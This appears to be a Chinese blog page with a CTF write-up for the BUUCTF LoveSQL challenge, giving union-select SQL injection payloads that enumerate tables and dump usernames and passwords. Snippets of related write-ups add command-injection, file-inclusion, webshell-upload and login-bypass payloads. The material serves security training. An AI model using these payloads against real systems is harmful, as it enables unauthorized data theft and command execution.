buuctf-web-[极客大挑战 2019]LoveSQL-wp

最新推荐文章于 2024-05-01 08:52:06 发布
原创 最新推荐文章于 2024-05-01 08:52:06 发布 · 228 阅读 · 0 ·
CC 4.0 BY-SA版权
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><

本文记录了通过SQL注入技巧破解LoveSQL极客挑战的过程。利用union select注入方法,逐步找到数据库表名及字段名,并最终获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[极客大挑战 2019]LoveSQL

知识点

  • 常规union select注入

过程

主页:

抓包分析下

手动测试下注入点

order by查下字段

admin' order by 3#

union select寻找显示位

-admin' union select 1,2,3%23

查表

-admin' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3%23

发现geekuser,l0ve1ysq1两张表

在l0ve1ysq1中查下字段

-admin' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'),3%23

dump数据

-admin' union select 1,(select group_concat(id,username,password) from l0ve1ysq1),3%23

得到flag

BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 431
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也不存在sql注入。直接御剑扫描(扫buuctf上的题要调线程和超时,我是线程10超时15,不然会被平台禁掉)。扫出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 1076
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
文件上传之黑名单验证绕过
weixin_34187822的博客
09-15 732
当做代码的审计或者文件搞渗文章上传的时候有时候会遇到黑名单的验证码,比如常规的一些脚本名asp php jsp这种的不允许上传,下面是我总结的一些绕过的方法Shtml<!--#includefile="/home/www/user8534/nav_foot.htm"--> //可以用来读文件<!--#exec cmd="ifconfig"--> //可...
buuctf-web-[ACTF2020 新生赛]Exec-wp
居上
06-25 233
[ACTF2020 新生赛]Exec 知识点 命令执行 过程 主页面: 这里是存在命令执行漏洞的,我们尝试去使用;执行命令 127.0.0.1;cat /flag
buuctf-web-[ACTF2020 新生赛]Include-wp
居上
06-22 228
[ACTF2020 新生赛]Include 知识点 php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。 过程 主页: 有个get型的参数,可以看到传入flag.php,这里是一个文件包含,但是无法查看php脚本的详细内容 payload ?file=php://filter/read=convert.base64-encode/resource=flag.php .
BUUCTF web wp
vegetable223的博客
11-28 470
BUUCTF-web warmup wp 首先认真阅读题目,一般题目信息有提示,有些还会有隐藏信息 题目名是“warm up”,热身?,看来没什么用。下面有提示我们这一题的主要知识点是php和代码审计,淦!发现都没学过,不过不要紧,不会我们可以百度啊!!! 打开链接 看到一张滑稽的表情,肯定不简单,直接f12查看源代码 下面展示一些 内联代码片。 <!DOCTYPE html> <html lang="en"> <head> <meta charset=
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
ccc6553584的博客
04-03 1119
输入11"时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号username输入1时,形成的sql语句是username输入1"时,形成的sql语句是正确的当字符串内需要包含双引号时,除了使用转义字符外,也可以使用一对单引号来包括字符串。字符串内的双引号被视为普通字符,无需特殊处理同理,当字符串内需要包含单引号时,除了使用转义字符外,也可以使用一对双引号来包括字符串。字符串内的单引号被视为普通字符,无需特殊处理username输入的是1'
BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1277
Upload=> 文件上传漏洞。
2024年最新Buuctf-Web-[极客挑战 2024]EasySQL 1 题解及思路总结
2401_84302369的博客
05-01 686
此时跳转到check.php页面,得到结果。可知此页面与数据库产生交互。
Buuctf-Web-[极客挑战 2024]EasySQL 1 题解及思路总结
2401_84281594的博客
04-28 854
SQL注入在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
buuctf-web-[ACTF2020 新生赛]BackupFile-wp
居上
07-17 270
[ACTF2020 新生赛]BackupFile 知识点 备份文件泄露 php中的弱类型比较 过程 使用扫描软件扫一下目录,扫到/index.php.bak <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key);
buuctf web wp
qq_63267612的博客
04-10 753
文章目录[极客挑战 2019]EasySQL [极客挑战 2019]EasySQL 打开后是一个登录框,直接尝试万能密码 (用户名:1’ or 1=1 # 密码:随便输) 登录得到flag 这里的万能密码是为什么呢? 数据库中的查询语句: select id from users where username = '' or 1=1-- and password = '456' 又 这里呢1=1永远为真,后面 and password = '456’被注释掉了。数据库不需要考虑,这里我们就跳
buuctf-web-[极客挑战 2019]Upload-wp
居上
07-12 269
[极客挑战 2019]Upload 知识点 上传phtml文件 嵌在script标签中的一句话木马 content-type的修改 请求体中的添加文件头 过程 主页就是上传点,先上传一个正常的shell.php文件 发现只能上传image,bp抓包依次尝试文件后缀名修改,content-type修改、文件名%00截断,添加文件头都失败 然后更改文件名为xx.phtml,,phtml是嵌入了php代码的html文件,尝试上传,请求体中的内容仍然是普通的一句话木马文件 检测到<?请求体中的
buuctf-web-[极客挑战 2019]Knife-wp
居上
06-28 220
[极客挑战 2019]Knife 知识点 蚁剑或者中国菜刀等工具的使用 过程 主页: 直接给出这个主页就是一句话木马 蚁剑连接,根目录查看到flag
buuctf-web-[GXYCTF2019]Ping Ping Ping-wp
居上
06-27 275
[GXYCTF2019]Ping Ping Ping 知识点 变量拼接 sh,bash下编码 绕过空格过滤 绕过关键字过滤 过程 主页: ?ip=127.0.0.1 ?ip=127.0.0.1;ls ?ip=127.0.0.1;cat flag.php 过滤了空格,使用$IFS$1来绕过 ?ip=127.0.0.1;cat$IFS$1flag.php 过滤了flag,但是可以查看下index.php ?ip=127.0.0.1;cat$IFS$1index.php |
buuctf-web-[极客挑战 2019]Havefun-wp
居上
06-22 179
[极客挑战 2019]Havefun 知识点 get型传参 过程 $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } 直接传入一个参数cat ?cat=dog
BUUCTF-Web-随便注-wp
single7_的博客
12-14 465
0x01 知识点 SQL注入-堆叠注入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种注入方式称为堆叠注入。 union injection(联合注入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语
buuctf-web-[极客挑战 2019]HardSQL-wp
居上
08-09 341
[极客挑战 2019]HardSQL 知识点 绕过一些简单的过滤 right() 过程 主页是一个登陆页面 过滤了关键字 and、=、空格、union等 查库 check.php?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21 查表 check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat
Buuctf-Web-[极客挑战 2019]EasySQL1 代码
最新发布
12-28
### Buuctf Web 极客挑战 2019 EasySQL1 解题代码 对于Buuctf Web中的极客挑战2019之EasySQL1,由于该题目存在未对输入参数进行适当过滤的情况,可以利用这一特性通过SQL注入的方式完成解题。下面展示的是基于此逻辑构建的攻击向量实现方式。 #### 使用Python脚本模拟请求并获取Flag ```python import requests url = "http://example.com/login" # 替换成实际地址 payload = { 'username': "' OR '1'='1", 'password': "' OR '1'='1" } response = requests.post(url, data=payload) if "flag{" in response.text: start_index = response.text.find("flag{") end_index = response.text.find('}', start_index) + 1 flag = response.text[start_index:end_index] print(f"The obtained flag is: {flag}") else: print("Failed to obtain the flag.") ``` 上述代码展示了如何构造一个简单的POST请求来发送含有SQL注入语句的数据包给目标网站,并从中提取返回页面内的`flag`字符串[^1]。 需要注意的是,在真实环境中应当合法合规地参与CTF竞赛活动,不得用于非法目的或损害他人利益的行为上。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值